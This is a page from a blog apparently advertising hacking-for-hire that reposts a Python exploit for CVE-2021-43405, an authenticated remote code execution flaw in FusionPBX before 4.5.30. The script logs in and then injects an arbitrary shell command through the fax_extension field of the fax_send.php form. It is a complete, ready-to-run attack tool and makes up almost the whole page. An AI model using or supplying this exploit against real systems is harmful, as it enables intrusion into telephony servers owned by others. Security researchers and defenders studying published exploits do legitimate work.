Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86370159

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 11/08/2021
# Exploit Author: Luska
# Vendor Homepage: https://www.fusionpbx.com/
# Software Link: https://github.com/fusionpbx/fusionpbx
# Version: < 4.5.30
# Tested on: Debian
# CVE : CVE-2021-43405

#!/usr/bin/python3
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import argparse


cookies = {'PHPSESSID': '31337'}
proxy = {'http': 'http://127.0.0.1:8080'}

def login(url, username, password):
    data = {
        'username': username,
        'password': password
    }
    r = requests.post(url + '/core/user_settings/user_dashboard.php', data=data, cookies=cookies)
    return r.status_code

def exploit_request(url, cmd):
    print('[+] Sending Exploit Request')
    mp_encoder = MultipartEncoder(fields={ 'fax_subject': '1337', 'fax_extension': f';{cmd} #', 'action': 'send', 'submit': 'send' })
    r = requests.post(url + '/app/fax/fax_send.php', cookies=cookies, headers={'Content-Type': mp_encoder.content_type}, data=mp_encoder, proxies=proxy)
    return r.status_code

def exploit(url, username, password, cmd):
    if login(url,username,password) == 200:
        print('[+] Login Successful')
        exploit_request(url, cmd)
        print('[+] Exploit Sucessful')
    else:
        print('[-] Login Failed')

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='[*] FusionPBX < 4.5.30 Remote Code Execution | CVE-2021-43405')

    parser.add_argument('-t', metavar='<target/host URL>', help='Target/host URL, example: http://127.0.0.1', required=True)
    parser.add_argument('-u', metavar='<user>', help='User to login', required=True)
    parser.add_argument('-p', metavar='<password>', help='User\'s password', required=True)
    parser.add_argument('-c', metavar='<cmd>', help='Command to be executed', required=True)
    
    args = parser.parse_args()

    target = args.t
    user = args.u
    password = args.p
    cmd = args.c

    exploit(target, user, password, cmd)